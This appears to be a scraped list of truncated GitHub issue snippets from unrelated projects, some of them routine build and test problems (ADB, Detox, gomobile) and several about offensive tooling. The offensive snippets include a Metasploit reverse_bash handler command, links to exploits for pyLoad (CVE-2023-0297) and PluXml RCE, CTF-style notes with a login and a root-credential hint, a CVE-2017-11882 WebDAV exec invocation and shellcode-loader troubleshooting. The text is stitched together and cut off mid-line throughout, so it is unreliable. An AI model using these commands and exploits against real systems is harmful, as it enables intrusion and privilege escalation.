-
Hi @I-Rinka,
Bottom-line up front: 'Trying to load module exits 0 and with message 'Exploit Finished. Can you see the reverse shell?' but no, I cannot. :)'
Was hoping you could shed some light o…
-
Keypoints:
- login with pyload:ploady
- pyLoader 0.5.0 -- https://github.com/JacobEbben/CVE-2023-0297
-
Keypoints:
- [PluXml Blog 5.8.9 Remote Code Execution](https://packetstormsecurity.com/files/176407/PluXml-Blog-5.8.9-Remote-Code-Execution.html)
- [PE] root credential info is in /var/mail/www-data…
-
I'm getting this on my 5041C:
```
08-09 06:48:28.608 8941 8941 I ADB_SERVICES: service_to_fd shell,v2,TERM=screen-256color,raw:dumpsys package com.genymobile.gnirehtet
08-09 06:48:28.796 8941 8…
xloem updated
5 years ago
-
## Steps to reproduce
1. Attack side
```bash
./msfconsole -qx 'use multi/handler; set payload cmd/unix/reverse_bash; set LHOST 127.0.0.1; set LPORT 4444; exploit'
```
2. Victim side
```bash
b…
-
### Description
So im setting up detox in our project - and everything seems to be running smoothly on iOS
On android however, i cannot seem to get the tests to run at all. I can build just fine, …
-
Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script: `python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.…
-
Hi,
I am trying to get ```executes shellcode.xml``` to work on my system but I am running into ```System.AccessViolationException: Attempted to read or write protected memory. This is often an indi…
-
It looks like the use of ampersand (&) is not supported? On the Rubber Ducky it works as expected when you use it after STRING, even though it's not mentioned in the wiki as a possible character to us…
-
Running go test golang.org/x/mobile/app:
````
--- FAIL: TestAndroidApp (1.01s)
app_test.go:232: gomobile version
app_test.go:232: gomobile install golang.org/x/mobile/app/internal/testapp
ap…